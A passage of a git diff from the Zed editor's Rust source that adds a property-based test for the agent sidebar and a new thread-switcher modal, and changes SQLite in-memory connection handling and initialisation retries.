new_path_list = + new_workspace.read_with(cx, |_, cx| workspace_path_list(&new_workspace, cx)); + assert_eq!( + new_path_list, + PathList::new(&[PathBuf::from("/project")]), + "the new workspace should be for the main repo, not the linked worktree", + ); +} + +mod property_test { + use super::*; + + struct UnopenedWorktree { + path: String, + main_workspace_path: String, + } + + struct TestState { + fs: Arc, + thread_counter: u32, + workspace_counter: u32, + worktree_counter: u32, + saved_thread_ids: Vec, + workspace_paths: Vec, + main_repo_indices: Vec, + unopened_worktrees: Vec, + } + + impl TestState { + fn new(fs: Arc, initial_workspace_path: String) -> Self { + Self { + fs, + thread_counter: 0, + workspace_counter: 1, + worktree_counter: 0, + saved_thread_ids: Vec::new(), + workspace_paths: vec![initial_workspace_path], + main_repo_indices: vec![0], + unopened_worktrees: Vec::new(), + } + } + + fn next_thread_id(&mut self) -> acp::SessionId { + let id = self.thread_counter; + self.thread_counter += 1; + let session_id = acp::SessionId::new(Arc::from(format!("prop-thread-{id}"))); + self.saved_thread_ids.push(session_id.clone()); + session_id + } + + fn remove_thread(&mut self, index: usize) -> acp::SessionId { + self.saved_thread_ids.remove(index) + } + + fn next_workspace_path(&mut self) -> String { + let id = self.workspace_counter; + self.workspace_counter += 1; + format!("/prop-project-{id}") + } + + fn next_worktree_name(&mut self) -> String { + let id = self.worktree_counter; + self.worktree_counter += 1; + format!("wt-{id}") + } + } + + #[derive(Debug)] + enum Operation { + SaveThread { workspace_index: usize }, + SaveWorktreeThread { worktree_index: usize }, + DeleteThread { index: usize }, + ToggleAgentPanel, + CreateDraftThread, + AddWorkspace, + OpenWorktreeAsWorkspace { worktree_index: usize }, + RemoveWorkspace { index: usize }, + SwitchWorkspace { index: usize }, + AddLinkedWorktree { workspace_index: usize }, + } + + // Distribution (out of 20 slots): + // SaveThread: 5 slots (~23%) + // SaveWorktreeThread: 2 slots (~9%) + // DeleteThread: 2 slots (~9%) + // ToggleAgentPanel: 2 slots (~9%) + // CreateDraftThread: 2 slots (~9%) + // AddWorkspace: 1 slot (~5%) + // OpenWorktreeAsWorkspace: 1 slot (~5%) + // RemoveWorkspace: 1 slot (~5%) + // SwitchWorkspace: 2 slots (~9%) + // AddLinkedWorktree: 4 slots (~18%) + const DISTRIBUTION_SLOTS: u32 = 22; + + impl TestState { + fn generate_operation(&self, raw: u32) -> Operation { + let extra = (raw / DISTRIBUTION_SLOTS) as usize; + let workspace_count = self.workspace_paths.len(); + + match raw % DISTRIBUTION_SLOTS { + 0..=4 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + 5..=6 if !self.unopened_worktrees.is_empty() => Operation::SaveWorktreeThread { + worktree_index: extra % self.unopened_worktrees.len(), + }, + 5..=6 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + 7..=8 if !self.saved_thread_ids.is_empty() => Operation::DeleteThread { + index: extra % self.saved_thread_ids.len(), + }, + 7..=8 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + 9..=10 => Operation::ToggleAgentPanel, + 11..=12 => Operation::CreateDraftThread, + 13 if !self.unopened_worktrees.is_empty() => Operation::OpenWorktreeAsWorkspace { + worktree_index: extra % self.unopened_worktrees.len(), + }, + 13 => Operation::AddWorkspace, + 14 if workspace_count > 1 => Operation::RemoveWorkspace { + index: extra % workspace_count, + }, + 14 => Operation::AddWorkspace, + 15..=16 => Operation::SwitchWorkspace { + index: extra % workspace_count, + }, + 17..=21 if !self.main_repo_indices.is_empty() => { + let main_index = self.main_repo_indices[extra % self.main_repo_indices.len()]; + Operation::AddLinkedWorktree { + workspace_index: main_index, + } + } + 17..=21 => Operation::SaveThread { + workspace_index: extra % workspace_count, + }, + _ => unreachable!(), + } + } + } + + fn save_thread_to_path( + state: &mut TestState, + project: &Entity, + cx: &mut gpui::VisualTestContext, + ) { + let session_id = state.next_thread_id(); + let title: SharedString = format!("Thread {}", session_id).into(); + let updated_at = chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 1, 1, 0, 0, 0) + .unwrap() + + chrono::Duration::seconds(state.thread_counter as i64); + save_thread_metadata(session_id, title, updated_at, None, project, cx); + } + + fn save_thread_to_path_with_main( + state: &mut TestState, + path_list: PathList, + main_worktree_paths: PathList, + cx: &mut gpui::VisualTestContext, + ) { + let session_id = state.next_thread_id(); + let title: SharedString = format!("Thread {}", session_id).into(); + let updated_at = chrono::TimeZone::with_ymd_and_hms(&chrono::Utc, 2024, 1, 1, 0, 0, 0) + .unwrap() + + chrono::Duration::seconds(state.thread_counter as i64); + let metadata = ThreadMetadata { + session_id, + agent_id: agent::ZED_AGENT_ID.clone(), + title, + updated_at, + created_at: None, + folder_paths: path_list, + main_worktree_paths, + archived: false, + }; + cx.update(|_, cx| { + ThreadMetadataStore::global(cx) + .update(cx, |store, cx| store.save_manually(metadata, cx)) + }); + cx.run_until_parked(); + } + + async fn perform_operation( + operation: Operation, + state: &mut TestState, + multi_workspace: &Entity, + _sidebar: &Entity, + cx: &mut gpui::VisualTestContext, + ) { + match operation { + Operation::SaveThread { workspace_index } => { + let project = multi_workspace.read_with(cx, |mw, cx| { + mw.workspaces() + .nth(workspace_index) + .unwrap() + .read(cx) + .project() + .clone() + }); + save_thread_to_path(state, &project, cx); + } + Operation::SaveWorktreeThread { worktree_index } => { + let worktree = &state.unopened_worktrees[worktree_index]; + let path_list = PathList::new(&[std::path::PathBuf::from(&worktree.path)]); + let main_worktree_paths = + PathList::new(&[std::path::PathBuf::from(&worktree.main_workspace_path)]); + save_thread_to_path_with_main(state, path_list, main_worktree_paths, cx); + } + Operation::DeleteThread { index } => { + let session_id = state.remove_thread(index); + cx.update(|_, cx| { + ThreadMetadataStore::global(cx) + .update(cx, |store, cx| store.delete(session_id, cx)); + }); + } + Operation::ToggleAgentPanel => { + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let panel_open = + workspace.read_with(cx, |_, cx| AgentPanel::is_visible(&workspace, cx)); + workspace.update_in(cx, |workspace, window, cx| { + if panel_open { + workspace.close_panel::(window, cx); + } else { + workspace.open_panel::(window, cx); + } + }); + } + Operation::CreateDraftThread => { + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let panel = + workspace.read_with(cx, |workspace, cx| workspace.panel::(cx)); + if let Some(panel) = panel { + let connection = StubAgentConnection::new(); + open_thread_with_connection(&panel, connection, cx); + cx.run_until_parked(); + } + workspace.update_in(cx, |workspace, window, cx| { + workspace.focus_panel::(window, cx); + }); + } + Operation::AddWorkspace => { + let path = state.next_workspace_path(); + state + .fs + .insert_tree( + &path, + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + let project = project::Project::test( + state.fs.clone() as Arc, + [path.as_ref()], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + let workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project.clone(), window, cx) + }); + add_agent_panel(&workspace, cx); + let new_index = state.workspace_paths.len(); + state.workspace_paths.push(path); + state.main_repo_indices.push(new_index); + } + Operation::OpenWorktreeAsWorkspace { worktree_index } => { + let worktree = state.unopened_worktrees.remove(worktree_index); + let project = project::Project::test( + state.fs.clone() as Arc, + [worktree.path.as_ref()], + cx, + ) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + let workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project.clone(), window, cx) + }); + add_agent_panel(&workspace, cx); + state.workspace_paths.push(worktree.path); + } + Operation::RemoveWorkspace { index } => { + let removed = multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(index).unwrap().clone(); + mw.remove(&workspace, window, cx) + }); + if removed { + state.workspace_paths.remove(index); + state.main_repo_indices.retain(|i| *i != index); + for i in &mut state.main_repo_indices { + if *i > index { + *i -= 1; + } + } + } + } + Operation::SwitchWorkspace { index } => { + let workspace = multi_workspace + .read_with(cx, |mw, _| mw.workspaces().nth(index).unwrap().clone()); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.activate(workspace, window, cx); + }); + } + Operation::AddLinkedWorktree { workspace_index } => { + let main_path = state.workspace_paths[workspace_index].clone(); + let dot_git = format!("{}/.git", main_path); + let worktree_name = state.next_worktree_name(); + let worktree_path = format!("/worktrees/{}", worktree_name); + + state.fs + .insert_tree( + &worktree_path, + serde_json::json!({ + ".git": format!("gitdir: {}/.git/worktrees/{}", main_path, worktree_name), + "src": {}, + }), + ) + .await; + + // Also create the worktree metadata dir inside the main repo's .git + state + .fs + .insert_tree( + &format!("{}/.git/worktrees/{}", main_path, worktree_name), + serde_json::json!({ + "commondir": "../../", + "HEAD": format!("ref: refs/heads/{}", worktree_name), + }), + ) + .await; + + let dot_git_path = std::path::Path::new(&dot_git); + let worktree_pathbuf = std::path::PathBuf::from(&worktree_path); + state + .fs + .add_linked_worktree_for_repo( + dot_git_path, + false, + git::repository::Worktree { + path: worktree_pathbuf, + ref_name: Some(format!("refs/heads/{}", worktree_name).into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + // Re-scan the main workspace's project so it discovers the new worktree. + let main_workspace = multi_workspace.read_with(cx, |mw, _| { + mw.workspaces().nth(workspace_index).unwrap().clone() + }); + let main_project = main_workspace.read_with(cx, |ws, _| ws.project().clone()); + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + state.unopened_worktrees.push(UnopenedWorktree { + path: worktree_path, + main_workspace_path: main_path.clone(), + }); + } + } + } + + fn update_sidebar(sidebar: &Entity, cx: &mut gpui::VisualTestContext) { + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.collapsed_groups.clear(); + let path_lists: Vec = sidebar + .contents + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::ProjectHeader { key, .. } => Some(key.path_list().clone()), + _ => None, + }) + .collect(); + for path_list in path_lists { + sidebar.expanded_groups.insert(path_list, 10_000); + } + sidebar.update_entries(cx); + }); + } + + fn validate_sidebar_properties(sidebar: &Sidebar, cx: &App) -> anyhow::Result<()> { + verify_every_workspace_in_multiworkspace_is_shown(sidebar, cx)?; + verify_all_threads_are_shown(sidebar, cx)?; + verify_active_state_matches_current_workspace(sidebar, cx)?; + Ok(()) + } + + fn verify_every_workspace_in_multiworkspace_is_shown( + sidebar: &Sidebar, + cx: &App, + ) -> anyhow::Result<()> { + let Some(multi_workspace) = sidebar.multi_workspace.upgrade() else { + anyhow::bail!("sidebar should still have an associated multi-workspace"); + }; + + let mw = multi_workspace.read(cx); + + // Every project group key in the multi-workspace that has a + // non-empty path list should appear as a ProjectHeader in the + // sidebar. + let expected_keys: HashSet<&project::ProjectGroupKey> = mw + .project_group_keys() + .filter(|k| !k.path_list().paths().is_empty()) + .collect(); + + let sidebar_keys: HashSet<&project::ProjectGroupKey> = sidebar + .contents + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::ProjectHeader { key, .. } => Some(key), + _ => None, + }) + .collect(); + + let missing = &expected_keys - &sidebar_keys; + let stray = &sidebar_keys - &expected_keys; + + anyhow::ensure!( + missing.is_empty() && stray.is_empty(), + "sidebar project groups don't match multi-workspace.\n\ + Only in multi-workspace (missing): {:?}\n\ + Only in sidebar (stray): {:?}", + missing, + stray, + ); + + Ok(()) + } + + fn verify_all_threads_are_shown(sidebar: &Sidebar, cx: &App) -> anyhow::Result<()> { + let Some(multi_workspace) = sidebar.multi_workspace.upgrade() else { + anyhow::bail!("sidebar should still have an associated multi-workspace"); + }; + let workspaces = multi_workspace + .read(cx) + .workspaces() + .cloned() + .collect::>(); + let thread_store = ThreadMetadataStore::global(cx); + + let sidebar_thread_ids: HashSet = sidebar + .contents + .entries + .iter() + .filter_map(|entry| entry.session_id().cloned()) + .collect(); + + let mut metadata_thread_ids: HashSet = HashSet::default(); + + // Query using the same approach as the sidebar: iterate project + // group keys, then do main + legacy queries per group. + let mw = multi_workspace.read(cx); + let mut workspaces_by_group: HashMap>> = + HashMap::default(); + for workspace in &workspaces { + let key = workspace.read(cx).project_group_key(cx); + workspaces_by_group + .entry(key) + .or_default() + .push(workspace.clone()); + } + + for group_key in mw.project_group_keys() { + let path_list = group_key.path_list().clone(); + if path_list.paths().is_empty() { + continue; + } + + let group_workspaces = workspaces_by_group + .get(group_key) + .map(|ws| ws.as_slice()) + .unwrap_or_default(); + + // Main code path queries (run for all groups, even without workspaces). + for metadata in thread_store + .read(cx) + .entries_for_main_worktree_path(&path_list) + { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + for metadata in thread_store.read(cx).entries_for_path(&path_list) { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + + // Legacy: per-workspace queries for different root paths. + let covered_paths: HashSet = group_workspaces + .iter() + .flat_map(|ws| { + ws.read(cx) + .root_paths(cx) + .into_iter() + .map(|p| p.to_path_buf()) + }) + .collect(); + + for workspace in group_workspaces { + let ws_path_list = workspace_path_list(workspace, cx); + if ws_path_list != path_list { + for metadata in thread_store.read(cx).entries_for_path(&ws_path_list) { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + } + } + + for workspace in group_workspaces { + for snapshot in root_repository_snapshots(workspace, cx) { + let repo_path_list = + PathList::new(&[snapshot.original_repo_abs_path.to_path_buf()]); + if repo_path_list != path_list { + continue; + } + for linked_worktree in snapshot.linked_worktrees() { + if covered_paths.contains(&*linked_worktree.path) { + continue; + } + let worktree_path_list = + PathList::new(std::slice::from_ref(&linked_worktree.path)); + for metadata in thread_store.read(cx).entries_for_path(&worktree_path_list) + { + metadata_thread_ids.insert(metadata.session_id.clone()); + } + } + } + } + } + + anyhow::ensure!( + sidebar_thread_ids == metadata_thread_ids, + "sidebar threads don't match metadata store: sidebar has {:?}, store has {:?}", + sidebar_thread_ids, + metadata_thread_ids, + ); + Ok(()) + } + + fn verify_active_state_matches_current_workspace( + sidebar: &Sidebar, + cx: &App, + ) -> anyhow::Result<()> { + let Some(multi_workspace) = sidebar.multi_workspace.upgrade() else { + anyhow::bail!("sidebar should still have an associated multi-workspace"); + }; + + let active_workspace = multi_workspace.read(cx).workspace(); + + // 1. active_entry must always be Some after rebuild_contents. + let entry = sidebar + .active_entry + .as_ref() + .ok_or_else(|| anyhow::anyhow!("active_entry must always be Some"))?; + + // 2. The entry's workspace must agree with the multi-workspace's + // active workspace. + anyhow::ensure!( + entry.workspace().entity_id() == active_workspace.entity_id(), + "active_entry workspace ({:?}) != active workspace ({:?})", + entry.workspace().entity_id(), + active_workspace.entity_id(), + ); + + // 3. The entry must match the agent panel's current state. + let panel = active_workspace.read(cx).panel::(cx).unwrap(); + if panel.read(cx).active_thread_is_draft(cx) { + anyhow::ensure!( + matches!(entry, ActiveEntry::Draft(_)), + "panel shows a draft but active_entry is {:?}", + entry, + ); + } else if let Some(session_id) = panel + .read(cx) + .active_conversation_view() + .and_then(|cv| cv.read(cx).parent_id(cx)) + { + anyhow::ensure!( + matches!(entry, ActiveEntry::Thread { session_id: id, .. } if id == &session_id), + "panel has session {:?} but active_entry is {:?}", + session_id, + entry, + ); + } + + // 4. Exactly one entry in sidebar contents must be uniquely + // identified by the active_entry. + let matching_count = sidebar + .contents + .entries + .iter() + .filter(|e| entry.matches_entry(e)) + .count(); + anyhow::ensure!( + matching_count == 1, + "expected exactly 1 sidebar entry matching active_entry {:?}, found {}", + entry, + matching_count, + ); + + Ok(()) + } + + #[gpui::property_test] + async fn test_sidebar_invariants( + #[strategy = gpui::proptest::collection::vec(0u32..DISTRIBUTION_SLOTS * 10, 1..5)] + raw_operations: Vec, + cx: &mut TestAppContext, + ) { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/my-project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + let project = + project::Project::test(fs.clone() as Arc, ["/my-project".as_ref()], cx) + .await; + project.update(cx, |p, cx| p.git_scans_complete(cx)).await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, _panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + let mut state = TestState::new(fs, "/my-project".to_string()); + let mut executed: Vec = Vec::new(); + + for &raw_op in &raw_operations { + let operation = state.generate_operation(raw_op); + executed.push(format!("{:?}", operation)); + perform_operation(operation, &mut state, &multi_workspace, &sidebar, cx).await; + cx.run_until_parked(); + + update_sidebar(&sidebar, cx); + cx.run_until_parked(); + + let result = + sidebar.read_with(cx, |sidebar, cx| validate_sidebar_properties(sidebar, cx)); + if let Err(err) = result { + let log = executed.join("\n "); + panic!( + "Property violation after step {}:\n{err}\n\nOperations:\n {log}", + executed.len(), + ); + } + } + } +} diff --git a/crates/sidebar/src/thread_switcher.rs b/crates/sidebar/src/thread_switcher.rs new file mode 100644 index 0000000000000000000000000000000000000000..86e2aeba38b9ee18a8f56597abc0d62f5741b714 --- /dev/null +++ b/crates/sidebar/src/thread_switcher.rs @@ -0,0 +1,230 @@ +use action_log::DiffStats; +use agent_client_protocol as acp; +use agent_ui::thread_metadata_store::ThreadMetadata; +use gpui::{ + Action as _, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Modifiers, + ModifiersChangedEvent, Render, SharedString, prelude::*, +}; +use ui::{AgentThreadStatus, ThreadItem, ThreadItemWorktreeInfo, prelude::*}; +use workspace::{ModalView, Workspace}; +use zed_actions::agents_sidebar::ToggleThreadSwitcher; + +pub(crate) struct ThreadSwitcherEntry { + pub session_id: acp::SessionId, + pub title: SharedString, + pub icon: IconName, + pub icon_from_external_svg: Option, + pub status: AgentThreadStatus, + pub metadata: ThreadMetadata, + pub workspace: Entity, + pub project_name: Option, + pub worktrees: Vec, + pub diff_stats: DiffStats, + pub is_title_generating: bool, + pub notified: bool, + pub timestamp: SharedString, +} + +pub(crate) enum ThreadSwitcherEvent { + Preview { + metadata: ThreadMetadata, + workspace: Entity, + }, + Confirmed { + metadata: ThreadMetadata, + workspace: Entity, + }, + Dismissed, +} + +pub(crate) struct ThreadSwitcher { + focus_handle: FocusHandle, + entries: Vec, + selected_index: usize, + init_modifiers: Option, +} + +impl ThreadSwitcher { + pub fn new( + entries: Vec, + select_last: bool, + window: &mut gpui::Window, + cx: &mut Context, + ) -> Self { + let init_modifiers = window.modifiers().modified().then_some(window.modifiers()); + let selected_index = if entries.is_empty() { + 0 + } else if select_last { + entries.len() - 1 + } else { + 1.min(entries.len().saturating_sub(1)) + }; + + if let Some(entry) = entries.get(selected_index) { + cx.emit(ThreadSwitcherEvent::Preview { + metadata: entry.metadata.clone(), + workspace: entry.workspace.clone(), + }); + } + + let focus_handle = cx.focus_handle(); + cx.on_focus_out(&focus_handle, window, |_this, _event, _window, cx| { + cx.emit(ThreadSwitcherEvent::Dismissed); + cx.emit(DismissEvent); + }) + .detach(); + + Self { + focus_handle, + entries, + selected_index, + init_modifiers, + } + } + + pub fn selected_entry(&self) -> Option<&ThreadSwitcherEntry> { + self.entries.get(self.selected_index) + } + + #[cfg(test)] + pub fn entries(&self) -> &[ThreadSwitcherEntry] { + &self.entries + } + + #[cfg(test)] + pub fn selected_index(&self) -> usize { + self.selected_index + } + + pub fn cycle_selection(&mut self, cx: &mut Context) { + if self.entries.is_empty() { + return; + } + self.selected_index = (self.selected_index + 1) % self.entries.len(); + self.emit_preview(cx); + } + + pub fn select_last(&mut self, cx: &mut Context) { + if self.entries.is_empty() { + return; + } + if self.selected_index == 0 { + self.selected_index = self.entries.len() - 1; + } else { + self.selected_index -= 1; + } + self.emit_preview(cx); + } + + fn emit_preview(&mut self, cx: &mut Context) { + if let Some(entry) = self.entries.get(self.selected_index) { + cx.emit(ThreadSwitcherEvent::Preview { + metadata: entry.metadata.clone(), + workspace: entry.workspace.clone(), + }); + } + } + + fn confirm(&mut self, _: &menu::Confirm, _window: &mut gpui::Window, cx: &mut Context) { + if let Some(entry) = self.entries.get(self.selected_index) { + cx.emit(ThreadSwitcherEvent::Confirmed { + metadata: entry.metadata.clone(), + workspace: entry.workspace.clone(), + }); + } + cx.emit(DismissEvent); + } + + fn cancel(&mut self, _: &menu::Cancel, _window: &mut gpui::Window, cx: &mut Context) { + cx.emit(ThreadSwitcherEvent::Dismissed); + cx.emit(DismissEvent); + } + + fn toggle( + &mut self, + action: &ToggleThreadSwitcher, + _window: &mut gpui::Window, + cx: &mut Context, + ) { + if action.select_last { + self.select_last(cx); + } else { + self.cycle_selection(cx); + } + } + + fn handle_modifiers_changed( + &mut self, + event: &ModifiersChangedEvent, + window: &mut gpui::Window, + cx: &mut Context, + ) { + let Some(init_modifiers) = self.init_modifiers else { + return; + }; + if !event.modified() || !init_modifiers.is_subset_of(event) { + self.init_modifiers = None; + if self.entries.is_empty() { + cx.emit(DismissEvent); + } else { + window.dispatch_action(menu::Confirm.boxed_clone(), cx); + } + } + } +} + +impl ModalView for ThreadSwitcher {} + +impl EventEmitter for ThreadSwitcher {} +impl EventEmitter for ThreadSwitcher {} + +impl Focusable for ThreadSwitcher { + fn focus_handle(&self, _cx: &gpui::App) -> FocusHandle { + self.focus_handle.clone() + } +} + +impl Render for ThreadSwitcher { + fn render(&mut self, _window: &mut gpui::Window, cx: &mut Context) -> impl IntoElement { + let selected_index = self.selected_index; + + v_flex() + .key_context("ThreadSwitcher") + .track_focus(&self.focus_handle) + .w(rems_from_px(440.)) + .p_1p5() + .gap_0p5() + .elevation_3(cx) + .on_modifiers_changed(cx.listener(Self::handle_modifiers_changed)) + .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::cancel)) + .on_action(cx.listener(Self::toggle)) + .children(self.entries.iter().enumerate().map(|(ix, entry)| { + let id = SharedString::from(format!("thread-switcher-{}", entry.session_id)); + + ThreadItem::new(id, entry.title.clone()) + .rounded(true) + .icon(entry.icon) + .status(entry.status) + .when_some(entry.icon_from_external_svg.clone(), |this, svg| { + this.custom_icon_from_external_svg(svg) + }) + .when_some(entry.project_name.clone(), |this, name| { + this.project_name(name) + }) + .worktrees(entry.worktrees.clone()) + .timestamp(entry.timestamp.clone()) + .title_generating(entry.is_title_generating) + .notified(entry.notified) + .when(entry.diff_stats.lines_added > 0, |this| { + this.added(entry.diff_stats.lines_added as usize) + }) + .when(entry.diff_stats.lines_removed > 0, |this| { + this.removed(entry.diff_stats.lines_removed as usize) + }) + .selected(ix == selected_index) + .base_bg(cx.theme().colors().surface_background) + .into_any_element() + })) + } +} diff --git a/crates/sqlez/src/connection.rs b/crates/sqlez/src/connection.rs index 53f0d4e2614f340cc0563d5cd9374bdc3626d9bb..fb3194aaf428f9848b858b104e94de60765d6f9a 100644 --- a/crates/sqlez/src/connection.rs +++ b/crates/sqlez/src/connection.rs @@ -18,7 +18,7 @@ pub struct Connection { unsafe impl Send for Connection {} impl Connection { - pub(crate) fn open(uri: &str, persistent: bool) -> Result { + fn open_with_flags(uri: &str, persistent: bool, flags: i32) -> Result { let mut connection = Self { sqlite3: ptr::null_mut(), persistent, @@ -26,7 +26,6 @@ impl Connection { _sqlite: PhantomData, }; - let flags = SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE; unsafe { sqlite3_open_v2( CString::new(uri)?.as_ptr(), @@ -44,6 +43,14 @@ impl Connection { Ok(connection) } + pub(crate) fn open(uri: &str, persistent: bool) -> Result { + Self::open_with_flags( + uri, + persistent, + SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE, + ) + } + /// Attempts to open the database at uri. If it fails, a shared memory db will be opened /// instead. pub fn open_file(uri: &str) -> Self { @@ -51,13 +58,17 @@ impl Connection { } pub fn open_memory(uri: Option<&str>) -> Self { - let in_memory_path = if let Some(uri) = uri { - format!("file:{}?mode=memory&cache=shared", uri) + if let Some(uri) = uri { + let in_memory_path = format!("file:{}?mode=memory&cache=shared", uri); + return Self::open_with_flags( + &in_memory_path, + false, + SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE | SQLITE_OPEN_URI, + ) + .expect("Could not create fallback in memory db"); } else { - ":memory:".to_string() - }; - - Self::open(&in_memory_path, false).expect("Could not create fallback in memory db") + Self::open(":memory:", false).expect("Could not create fallback in memory db") + } } pub fn persistent(&self) -> bool { @@ -265,9 +276,50 @@ impl Drop for Connection { mod test { use anyhow::Result; use indoc::indoc; + use std::{ + fs, + sync::atomic::{AtomicUsize, Ordering}, + }; use crate::connection::Connection; + static NEXT_NAMED_MEMORY_DB_ID: AtomicUsize = AtomicUsize::new(0); + + fn unique_named_memory_db(prefix: &str) -> String { + format!( + "{prefix}_{}_{}", + std::process::id(), + NEXT_NAMED_MEMORY_DB_ID.fetch_add(1, Ordering::Relaxed) + ) + } + + fn literal_named_memory_paths(name: &str) -> [String; 3] { + let main = format!("file:{name}?mode=memory&cache=shared"); + [main.clone(), format!("{main}-wal"), format!("{main}-shm")] + } + + struct NamedMemoryPathGuard { + paths: [String; 3], + } + + impl NamedMemoryPathGuard { + fn new(name: &str) -> Self { + let paths = literal_named_memory_paths(name); + for path in &paths { + let _ = fs::remove_file(path); + } + Self { paths } + } + } + + impl Drop for NamedMemoryPathGuard { + fn drop(&mut self) { + for path in &self.paths { + let _ = fs::remove_file(path); + } + } + } + #[test] fn string_round_trips() -> Result<()> { let connection = Connection::open_memory(Some("string_round_trips")); @@ -382,6 +434,41 @@ mod test { assert_eq!(read_blobs, vec![blob]); } + #[test] + fn named_memory_connections_do_not_create_literal_backing_files() { + let name = unique_named_memory_db("named_memory_connections_do_not_create_backing_files"); + let guard = NamedMemoryPathGuard::new(&name); + + let connection1 = Connection::open_memory(Some(&name)); + connection1 + .exec(indoc! {" + CREATE TABLE shared ( + value INTEGER + )"}) + .unwrap()() + .unwrap(); + connection1 + .exec("INSERT INTO shared (value) VALUES (7)") + .unwrap()() + .unwrap(); + + let connection2 = Connection::open_memory(Some(&name)); + assert_eq!( + connection2 + .select_row::("SELECT value FROM shared") + .unwrap()() + .unwrap(), + Some(7) + ); + + for path in &guard.paths { + assert!( + fs::metadata(path).is_err(), + "named in-memory database unexpectedly created backing file {path}" + ); + } + } + #[test] fn multi_step_statement_works() { let connection = Connection::open_memory(Some("multi_step_statement_works")); diff --git a/crates/sqlez/src/thread_safe_connection.rs b/crates/sqlez/src/thread_safe_connection.rs index 966f14a9c2f244780da7190aebac88e95c7ac068..7b3630cdf65f900469e3d7544f3bd75b33250625 100644 --- a/crates/sqlez/src/thread_safe_connection.rs +++ b/crates/sqlez/src/thread_safe_connection.rs @@ -7,12 +7,15 @@ use std::{ ops::Deref, sync::{Arc, LazyLock}, thread, + time::Duration, }; use thread_local::ThreadLocal; use crate::{connection::Connection, domain::Migrator, util::UnboundedSyncSender}; const MIGRATION_RETRIES: usize = 10; +const CONNECTION_INITIALIZE_RETRIES: usize = 50; +const CONNECTION_INITIALIZE_RETRY_DELAY: Duration = Duration::from_millis(1); type QueuedWrite = Box; type WriteQueue = Box; @@ -197,21 +200,54 @@ impl ThreadSafeConnection { Self::open_shared_memory(uri) }; + if let Some(initialize_query) = connection_initialize_query { + let mut last_error = None; + let initialized = (0..CONNECTION_INITIALIZE_RETRIES).any(|attempt| { + match connection + .exec(initialize_query) + .and_then(|mut statement| statement()) + { + Ok(()) => true, + Err(err) + if is_schema_lock_error(&err) + && attempt + 1 < CONNECTION_INITIALIZE_RETRIES => + { + last_error = Some(err); + thread::sleep(CONNECTION_INITIALIZE_RETRY_DELAY); + false + } + Err(err) => { + panic!( + "Initialize query failed to execute: {}\n\nCaused by:\n{err:#}", + initialize_query + ) + } + } + }); + + if !initialized { + let err = last_error + .expect("connection initialization retries should record the last error"); + panic!( + "Initialize query failed to execute after retries: {}\n\nCaused by:\n{err:#}", + initialize_query + ); + } + } + // Disallow writes on the connection. The only writes allowed for thread safe connections // are from the background thread that can serialize them. *connection.write.get_mut() = false; - if let Some(initialize_query) = connection_initialize_query { - connection.exec(initialize_query).unwrap_or_else(|_| { - panic!("Initialize query failed to execute: {}", initialize_query) - })() - .unwrap() - } - connection } } +fn is_schema_lock_error(err: &anyhow::Error) -> bool { + let message = format!("{err:#}"); + message.contains("database schema is locked") || message.contains("database is locked") +} + impl ThreadSafeConnection { /// Special constructor for ThreadSafeConnection which disallows db initialization and migrations. /// This allows construction to be infallible and not write to the db. @@ -282,7 +318,7 @@ mod test { use indoc::indoc; use std::ops::Deref; - use std::thread; + use std::{thread, time::Duration}; use crate::{domain::Domain, thread_safe_connection::ThreadSafeConnection}; @@ -318,38 +354,21 @@ mod test { } #[test] - #[should_panic] - fn wild_zed_lost_failure() { - enum TestWorkspace {} - impl Domain for TestWorkspace { - const NAME: &str = "workspace"; - - const MIGRATIONS: &[&str] = &[" - CREATE TABLE workspaces( - workspace_id INTEGER PRIMARY KEY, - dock_visible INTEGER, -- Boolean - dock_anchor TEXT, -- Enum: 'Bottom' / 'Right' / 'Expanded' - dock_pane INTEGER, -- NULL indicates that we don't have a dock pane yet - timestamp TEXT DEFAULT CURRENT_TIMESTAMP NOT NULL, - FOREIGN KEY(dock_pane) REFERENCES panes(pane_id), - FOREIGN KEY(active_pane) REFERENCES panes(pane_id) - ) STRICT; - - CREATE TABLE panes( - pane_id INTEGER PRIMARY KEY, - workspace_id INTEGER NOT NULL, - active INTEGER NOT NULL, -- Boolean - FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id) - ON DELETE CASCADE - ON UPDATE CASCADE - ) STRICT; - "]; - } - - let builder = - 